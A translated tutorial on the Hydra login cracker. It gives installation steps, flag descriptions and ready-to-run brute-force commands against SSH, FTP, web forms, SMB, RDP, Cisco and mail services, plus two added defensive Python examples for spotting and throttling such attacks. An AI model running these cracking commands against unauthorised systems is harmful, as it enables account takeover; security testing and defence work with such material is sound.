Linux Brute Force hack tool Hydra Detailed

Source: Internet
Author: User

Today I used this tool while helping a friend with a honeypot test, and it was quite convenient. I also looked up related material online, found a good article, and am sharing it with everyone:

First, Introduction

Number one of the biggest security holes is passwords, as every password security study shows. Hydra is a parallelized login cracker which supports numerous protocols to attack. New modules are easy to add; besides that, it is flexible and very fast.

Hydra was tested to compile on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX, and is made available under GPLv3 with a special OpenSSL license expansion.

Currently this tool supports:
AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

For HTTP, POP3, IMAP and SMTP, several login mechanisms like plain and MD5 digest etc. are supported.

This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system.

The program was maintained by Van Hauser and David Maciejak.

The Hackers Choice
http://www.thc.org/thc-hydra

Second, Installation

1. Install dependent packages

    • Ubuntu/Debian
# apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev libncurses5-dev hydra

On Debian and Ubuntu releases, Hydra is included in the package sources and can be installed directly online with apt-get.

    • Redhat/Fedora
# yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
    • OpenSuSE
# zypper install libopenssl-devel pcre-devel libidn-devel ncpfs-devel libssh-devel postgresql-devel subversion-devel libncurses-devel

In this experiment, CentOS release 5.6 (Final) was used, and the relevant dependency packages after the yum installation are as follows:

2. Hydra installation

# wget http://www.thc.org/releases/hydra-7.4.1.tar.gz
# tar zxvf hydra-7.4.1.tar.gz
# cd hydra-7.4.1
# ./configure
# make && make install

./configure detects some components of the current system configuration, mainly the libraries that the cracking modules depend on. You can install the corresponding support libraries and dependency packages as needed.

# make

# make install

Third, Syntax

# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]

-R
Resume cracking from the last saved progress

-S
Uppercase; connect using SSL

-s <PORT>
Lowercase; specify a non-default port with this parameter

-l <LOGIN>
Specify a single user name to crack

-L <FILE>
Specify a dictionary of user names

-p <PASS>
Lowercase; specify a single password. Rarely used, since a password dictionary is usually used instead

-P <FILE>
Uppercase; specify the password dictionary

-e <ns>
Optional; n: try a null password, s: try the specified user name as the password

-C <FILE>
Use a colon-separated format, such as "login:password", instead of the -L/-P parameters

-M <FILE>
Specify the target list file, one target per line

-o <FILE>
Specify the result output file

-f
After using the -M parameter, stop cracking when the first login/password pair is found

-t <TASKS>
The number of concurrently running threads; the default is 16

-w <TIME>
Set the maximum timeout in seconds; the default is 30s

-v / -V
Show the detailed process

server
Destination IP

service
Specify the service name. Supported services and protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp, et cetera

OPT
Options available

Fourth, Examples

1. Manually create the user name dictionary and the password dictionary. This is only a demonstration, so they hold just a few user names and weak passwords. For real cracking, a powerful dictionary needs to be generated using a password dictionary generator.

2. Crack SSH:

# hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh

When cracking succeeds, the results are displayed directly.

You can also specify a result output file using the -o option.

# hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh
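
On the honeypot side of such a test, a run like the one above leaves a recognisable trace: many attempts in a short time and, because of -e ns, an empty password plus the login name as password for each user. The following Python code is an added example, not part of the original article; the JSON log format, field names and thresholds are assumptions, and the sample lines are constructed.

```python
import json
from collections import defaultdict
from datetime import datetime

# Constructed sample: JSON lines from a hypothetical SSH honeypot that logs each
# attempted credential pair. The field names are assumptions for this example.
SAMPLE_LOG = """\
{"ts": "2013-05-02T10:00:01", "src_ip": "192.0.2.10", "user": "root", "password": ""}
{"ts": "2013-05-02T10:00:02", "src_ip": "192.0.2.10", "user": "root", "password": "root"}
{"ts": "2013-05-02T10:00:03", "src_ip": "192.0.2.10", "user": "root", "password": "123456"}
{"ts": "2013-05-02T10:00:04", "src_ip": "192.0.2.10", "user": "admin", "password": ""}
{"ts": "2013-05-02T10:00:05", "src_ip": "192.0.2.10", "user": "admin", "password": "admin"}
{"ts": "2013-05-02T10:00:06", "src_ip": "192.0.2.10", "user": "admin", "password": "123456"}
{"ts": "2013-05-02T10:00:00", "src_ip": "198.51.100.7", "user": "alice", "password": "hunter2"}
{"ts": "2013-05-02T10:05:00", "src_ip": "198.51.100.7", "user": "alice", "password": "hunter3"}
this line is truncated {"ts":
"""

def analyze(lines, window=60, min_attempts=5):
    """Summarise login attempts per source IP and flag dictionary-attack traits."""
    by_ip = defaultdict(list)
    for line in lines:
        try:
            ev = json.loads(line)
            ts = datetime.fromisoformat(ev["ts"])
            by_ip[ev["src_ip"]].append((ts, ev["user"], ev["password"]))
        except (ValueError, KeyError, TypeError):
            continue  # skip blank or malformed records instead of aborting
    report = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e[0])
        burst = start = 0
        for end, (ts, _, _) in enumerate(events):
            while (ts - events[start][0]).total_seconds() > window:
                start += 1
            burst = max(burst, end - start + 1)  # most attempts in any window
        null_pw = {u for _, u, p in events if p == ""}
        login_as_pw = {u for _, u, p in events if p == u}
        report[ip] = {
            "attempts": len(events),
            "users": len({u for _, u, _ in events}),
            "burst": burst,
            "ns_probe": bool(null_pw & login_as_pw),   # the "-e ns" pattern
            "brute_force": burst >= min_attempts,
        }
    return report

if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_LOG.splitlines()), indent=2))
```

A source that trips both `ns_probe` and `brute_force` is a strong candidate for automated blocking; a source with only a couple of spaced-out failures, like the second address in the sample, is more likely a mistyped password.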

Fifth, Other types of password cracking

    • Crack FTP:
# hydra <IP> ftp -l <user name> -P <password dictionary> -t <threads, default 16> -vV
# hydra <IP> ftp -l <user name> -P <password dictionary> -e ns -vV
    • Crack a web login submitted via GET:
# hydra -l <user name> -P <password dictionary> -t <threads> -vV -e ns <IP> http-get /admin/
# hydra -l <user name> -P <password dictionary> -t <threads> -vV -e ns -f <IP> http-get /admin/index.php
    • Crack a web login submitted via POST:

The strength of this software is that it supports cracking many protocols and also supports cracking the login of a web user interface. A form submitted via GET is relatively simple; here we show the idea for cracking a password submitted via the POST method. A bad thing about this tool is that if the target website is logged in, it will be impossible to hack the code. The form to crack is as follows:

<form action="index.php" method="POST">
<input type="text" name="name" /><br><br>
<input type="password" name="pwd" /><br><br>
<input type="submit" name="sub" value="Submit">
</form>

Assuming that you have a password login form like this one, we execute the command:

# hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form "index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>"

  Description: the user name to crack is admin, the password dictionary is pass.lst, the cracked result is saved in ok.lst, -t 1 sets the number of simultaneous threads to 1, -f stops as soon as a password is cracked, the IP is the local host, which is the destination IP, and http-post-form means the crack targets a form password submitted using the HTTP POST method.

The parameters that follow are the name attributes of the corresponding form fields in the web page, and the <title> that follows is the content of the response that indicates a wrong guess, which can be customized.
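
A form like the one above answers every guess, so the size of the dictionary is the only limit. The following Python code is an added example, not part of the original article, showing a server-side throttle for the form fields `name` and `pwd`; the class name, the thresholds and the credential store are assumptions made for the demonstration.

```python
import hmac
import time

MAX_FAILURES = 5   # failures allowed per key inside WINDOW (assumed policy)
WINDOW = 300       # seconds
# Constructed credential store for the demo; a real one holds salted hashes.
USERS = {"admin": "S3cure-Example!"}

class LoginThrottle:
    """Counts recent failures per source IP and per user name (hypothetical helper)."""

    def __init__(self, clock=time.monotonic):
        self.clock = clock
        self.failures = {}  # key -> timestamps of recent failed attempts

    def _recent(self, key):
        cutoff = self.clock() - WINDOW
        kept = [t for t in self.failures.get(key, []) if t > cutoff]
        self.failures[key] = kept
        return kept

    def attempt(self, src_ip, name, pwd):
        """Handle one POST of the form fields `name` and `pwd`."""
        keys = (("ip", src_ip), ("user", name))
        if any(len(self._recent(k)) >= MAX_FAILURES for k in keys):
            return "locked"  # refuse before the password is even compared
        expected = USERS.get(name, "")
        # Constant-time comparison, so response timing does not leak a prefix match.
        if name in USERS and hmac.compare_digest(pwd.encode(), expected.encode()):
            return "ok"
        now = self.clock()
        for k in keys:
            self.failures[k].append(now)
        return "invalid"

def replay_wordlist(throttle, src_ip, name, words):
    """Feed a word list through the throttle and return each response."""
    return [throttle.attempt(src_ip, name, w) for w in words]
```

Once the limit is reached, even the correct password is answered with "locked", so a word list stops yielding information after five guesses per window. Locking by user name also lets a third party lock out the real user, which is why the window is short and the per-IP key is tracked separately.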

    • Crack HTTPS:
# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
    • Crack TeamSpeak:
# hydra -l <user name> -P <password dictionary> -s <port number> -vV <IP> teamspeak
    • Crack Cisco:
# hydra -P pass.txt 10.36.16.18 cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
    • Crack SMB:
# hydra -l administrator -P pass.txt 10.36.16.18 smb
    • Crack POP3:
# hydra -l muts -P pass.txt my.pop3.mail pop3
    • Crack RDP:
# hydra <IP> rdp -l administrator -P pass.txt -V
    • Crack HTTP proxy:
# hydra -l admin -P pass.txt http-proxy://10.36.16.18
    • Crack IMAP:
# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
    • Crack Telnet:
# hydra <IP> telnet -l <user> -P <password dictionary> -t 32 -s 23 -e ns -f -V

Sixth, Summary

This tool is far more powerful than the tests above show. The key to whether a password can be cracked lies in a powerful dictionary; for social-engineering-type penetration, it can sometimes have a multiplier effect.
